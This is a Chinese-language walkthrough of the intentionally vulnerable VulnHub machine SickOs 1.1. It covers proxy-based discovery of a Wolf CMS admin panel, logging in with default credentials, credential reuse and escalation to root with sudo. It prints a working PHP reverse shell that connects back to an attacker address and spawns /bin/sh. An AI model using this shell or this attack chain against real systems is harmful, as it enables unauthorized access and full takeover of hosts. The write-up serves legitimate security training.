靶机地址:
https://www.vulnhub.com/entry/sickos-11,132/
nmap 扫描一下端口
3128 端口开着一个代理服务,使用它提供的代理去访问一下
访问 robots 得到一个 cms
访问 robots.txt 中的 /wolfcms
搜一下,得到后台登录页面:/?/admin/login
使用默认账号密码 admin:admin 登录成功
后台可以写文件啥的,写个 php 的反弹 shell
<?php
$ip = '192.168.17.1';
$port = '6666';
$sock = fsockopen($ip, $port);
$descriptorspec = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open('/bin/sh',$descriptorspec, $pipes);
proc_close($process);
?>
在 config.php 中找到了数据库的用户名与密码
用数据库的那个密码试一下,登录用户:sickos,成功!
同时既然已经知道了密码,sudo -s
直接拿到了 root 权限
没学到什么新的知识 Orz,现在做靶机感觉越来越没啥意思了,想想该是因为是参考了别人的 wp 做出来的吧 。做了也 30 多个了,后面就尽量自己做,反正跟 CTF 题一样必然有解,这样应该就不能一周一更了,毕竟大部分时间还是想放在 pwn 的学习上。
就这字数还不够!?阿巴阿巴阿巴阿巴阿巴阿巴🤤
本文始发于微信公众号(陈冠男的游戏人生):【Vulnhub】SickOs1.1
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论